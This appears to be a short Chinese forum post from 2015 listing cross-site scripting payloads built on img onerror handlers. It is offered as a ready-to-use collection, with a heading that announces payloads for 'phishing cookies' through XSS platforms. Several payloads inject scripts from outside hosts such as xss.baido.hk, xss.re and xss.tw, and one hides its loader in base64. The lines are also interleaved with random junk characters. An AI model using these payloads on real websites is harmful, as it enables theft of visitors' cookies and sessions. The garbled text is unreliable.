<img src='non-exist.jpg'onerror="alert('xss')">: O2 s5 d8 Z! A. \- d7 m4 Q
<img src=# onerror=alert(123)>8 _5 i( ?# }5 z( p1 A
<img src=# onerror=alert(document.cookie)>
# M8 C8 a8 o* P下面是利用平台钓cookie的
- ^, `& N) M: r <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>& v3 j. Y; i; N1 ~: |6 S
5 S+ l$ U- }( J1 W" J
( k( C5 L; F) k
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>) o4 ~- j6 F, ^( o
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
: e. ?% ]0 w# d' c: x8 i6 A“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
2 P/ G. _- w; F$ v<img src=1 onerror=jQuery.getScript("//xss.re/974")> , J3 T5 ]* g5 S- x" ^4 w6 r, M
<img src="#">
$ R7 c% ] L) r) E<img src="#">; K% T5 d5 q3 T5 P$ M
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
: P5 X6 V- ~6 B$ @3 g<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">' G9 F3 {7 _/ E3 F& C
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
3 L. k5 \" C% @, M' [: z( a<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
& m5 f" X) {* G4 L% e% Y/ s t<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>4 U) C2 s% `8 m: x" F4 W
<img src=x width="0" height="0"></img>
5 n5 g1 L# ~6 ]) ~# l<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>8 o1 s6 E3 F! O
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
* h( c+ u" y8 B3 v: N+ R! T+ Y |
发表于 2015-10-18 14:33:54
收藏
支持
反对